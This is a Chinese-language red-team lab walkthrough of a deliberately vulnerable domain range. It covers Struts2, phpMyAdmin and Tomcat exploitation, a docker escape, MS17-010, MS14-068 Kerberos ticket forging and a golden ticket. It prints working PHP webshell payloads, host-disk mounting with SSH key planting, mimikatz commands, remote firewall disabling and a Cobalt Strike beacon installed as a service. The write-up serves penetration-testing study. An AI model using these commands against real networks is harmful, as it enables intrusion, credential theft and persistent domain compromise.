红队评估四记录

环境准备

0x01 网络环境

我们总共拿到了3台机器，除了WEB机器需要配置双网卡外，其他的机器都只配置183网段的内网网卡即可。

0x02 WEB服务

在官网给出了参考的学习路径，故我们启动前三个进行WEB服务的搭建

Struts2漏洞（S2-053）

pma文件包含漏洞（CVE-2018-12613）

tomcat PUT文件上传漏洞（CVE-2017-12615）：

启动完成后，相应靶机的地址如下

渗透流程

0x01 Struts2

使用工具进行检测

根据得到的根目录上传Webshell

冰蝎连接

0x02 PMA文件包含

根据Poc进行验证，输入查询语句并尝试包含Session文件

`SELECT '<?=@eval($_GET[g]);?>';`

包含成功，可以进行利用

接着执行查询，使得包含后能够生成一句话木马

SELECT `<?php fputs(fopen("a.php","w"),'<?php eval($_POST[a]);?>');?>`; 

访问后在根目录下可以看到生成的一句话木马文件

蚁剑连接

0x03 Tomcat PUT文件上传

上传Webshell

冰蝎连接

0x04 docker逃逸

这里尝试了诸多方法都失败了，最后发现

fdisk -l

能够看到物理机的磁盘，按理来说这是要用特权模式启动容器才可能出现的情况，这个可能是环境本身的原因？

但既然有我们就可以好好利用了，就用这个容器进行逃逸吧

挂载磁盘

mkdir /test
mount /dev/sda1 /test

这里有点小坑，正常来说authorized_keys文件的权限应该是644，但本机上没有该文件，然后使用了如下命令写入自己的ssh公钥

echo '<your-keys>' > /test/home/ubuntu/.ssh/authorized_keys

这个新生成的文件是640权限的，这导致使用ssh登陆时依旧需要WEB机器的密码，然后这个容器中是没有sudo和chmod命令的，无法在容器中更改文件的权限

我把这个算作异常情况，所以直接登上去改成了644

ubuntu@ubuntu:~/.ssh$ sudo chmod 644 authorized_keys

后记：在寻找更佳的解决方案的时候发现有个方案是先覆写WEB机器的公钥文件然后复制，参考

在修改完成后就能正常免密登陆了

这里试着使用脏牛漏洞提权，但是失败了，原因未知

0x05 内网渗透

我们的目的最后是拿下域控，边缘机器能够架设路由的话就问题不大，所以我们就直接上线msf了。上线msf后添加路由

添加路由后使用MS17-010的扫描模块进行扫描，发现129和130两台机子都在影响范围内

0x06 非预期解-直接拿下域控

这里就发生了比较有趣的事情，在msf上，对两台机器的MS17-010模块的利用都是以失败告终了（130的图忘了截了）

无论是架设代理还是使用bind_tcp，都是利用失败，原因未知

然后我使用了原生的方程式工具直接把域控的机器打下来了。。

虽然有些突然，但这也是域中的机器，习惯性地收集些信息

net user /domain

net time /domain

dump了hash拿去解密能够拿到域控的密码

0x07 非预期解-尝试拿下PC机

douser的密码没能解出（但理论上可以传递哈希），但是根据官方的提示我们能在WEB机器的bash执行历史记录中发现该用户的密码

但是尝试进行哈希传递时失败了，这里卡了好久

Google了一下，报错原因可能是域的配置出现了问题

使用原生的PsExec也失败了，然后两天后还是没找到方法，域控也拿到了，遂在该解法中放弃了这台机器

0x08 预期解-上线PC

这里参考别的师傅的正常打法再完整走一遍流程

正常来说我们应该能通过MS17-010漏洞拿下了PC机的Meterpreter，但这里使用msf的web_delivery模块时还是会出问题，这里我直接虚拟机登录后上线CS了

0x09 预期解-域提权

无关的信息收集就暂不列出了，这里是使用MS17-068漏洞进行提权并拿下域控

net computers #CS独有命令

whoami /all #获取域用户SID

在之前我们提到过泄露的域用户和对应的密码，可以用它生成所需的凭据

ms14-068.exe -u douser@demo.com -p Dotest123 -s S-1-5-21-979886063-1111900045-1414766810-1107 -d 192.168.183.130

之后清除内存中的票据并将生成的票据注入

kerberos::purge
kerberos::ptc 生成的票据名

进行权限验证，尝试访问域控

dir \\WIN-ENS2VR5TR3N\c$

0x0A 预期解-上线域控

在确定拿到域管权限后可以使用sc上线CS

首先是关闭防火墙

sc \\WIN-ENS2VR5TR3N create closewall binpath= "netsh advfirewall set allprofiles state off"
sc \\WIN-ENS2VR5TR3N start closewall

制作木马并上传PC机器

使用copy命令上传到域控

copy C:\Users\douser\Documents\beacon.exe \\WIN-ENS2VR5TR3N\c$

使用sc创建服务并启动

sc \\WIN-ENS2VR5TR3N create cs binpath= "c:\beacon.exe"
sc \\WIN-ENS2VR5TR3N start cs

之后导出hash

0x0B 预期解-权限维持

之后试试黄金票据进行权限维持

先是获取需要伪造用户的SID

wmic useraccount get name,sid

在之前的HashDump中能够拿到krbtgt的NTLM Hash，我们使用它来生成黄金票据

kerberos::golden /admin:administrator /domain:demo.com /sid:S-1-5-21-979886063-1111900045-1414766810 /krbtgt:7c4ed692473d4b4344c3ba01c5e6cb63 /ticket:Administrator.kiribi

之后对票据有效性进行验证

首先清除内存中的票据

kerberos::purge

尝试域控的目录，可以看到权限不足

dir \\WIN-ENS2VR5TR3N\c$

将生成的黄金票据注入到内存中

kerberos::ptt Administrator.kiribi

查看注入的票据

kerberos::tgt

再尝试列目录，可以看到成功了

dir \\WIN-ENS2VR5TR3N\c$

这样，我们就可以在一段时间内维持域内权限了，只要krbtgt不更改密码这张票据就一直有效。